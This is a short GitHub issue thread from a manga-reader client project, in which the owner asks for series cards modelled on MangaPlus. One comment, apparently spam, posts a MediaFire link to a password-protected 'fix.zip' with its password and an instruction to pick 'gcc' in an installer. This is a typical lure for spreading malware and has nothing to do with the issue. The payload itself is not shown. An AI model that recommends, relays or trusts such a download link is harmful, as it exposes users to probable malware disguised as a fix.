### ISSUE TITLE
Design manga series component cards

### ISSUE THREAD

**Issue by EclipseLunaria** [EclipseLunaria/manga-reader-client#11]
design cards similar to [mangaplus](https://mangaplus.shueisha.co.jp/ranking/trending)

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by EclipseLunaria** [comment]
Followed design and successfully deployed
